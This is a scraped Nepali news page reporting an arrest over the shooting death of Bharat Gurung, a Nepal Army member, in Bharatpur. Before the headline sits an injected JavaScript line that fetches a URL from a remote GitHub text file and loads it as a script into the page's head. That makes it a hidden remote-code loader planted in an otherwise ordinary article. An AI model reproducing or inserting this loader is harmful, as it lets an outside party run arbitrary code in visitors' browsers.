;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपाली सेनामा कार्यरत भरत गुरुङको हत्या गरेको आरोपमा एकजना पक्राउ – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • नेपाली सेनामा कार्यरत भरत गुरुङको हत्या गरेको आरोपमा एकजना पक्राउ
Breaking News

नेपाली सेनामा कार्यरत भरत गुरुङको हत्या गरेको आरोपमा एकजना पक्राउ

साउन ८ ,काठमान्डौ  | चितावानको भरतपुरमा नेपाली सेनामा  कार्यरत भरत गुरुङको को हत्या गरेको आरोपमा एकजना पक्राउ परेका छन् |

नेपाली सेनामा कार्यरत धादिङ घर भएका ३६ वर्षीय गुरुङको बिहीबार भरतपुर महानगरपालिका वडा नम्बर १७ मा शव फेला परेको थियो । उनको टाउकोमा गोली लागेको थियो ।घटनास्थलबाट गोलीको खोका समेत बरामद भएको थियो ।उक्त घटनाको अनुसन्धानको क्रममा प्रहरी बिहीबार नै एकजनालाई पक्राउ गरेको हो । ती व्यक्तिको साथबाट एकथान हतियार समेत बरामद गरेको प्रहरी स्रोतले जानकारी दिएको छ ।

पक्राउ परेका व्यक्ति र घटनाको सम्बन्धमा प्रहरीले शुक्रबार पत्रकार सम्मेलन गरी जानकारी दिंदै छ ।

फेसबुक प्रतिक्रियाहरु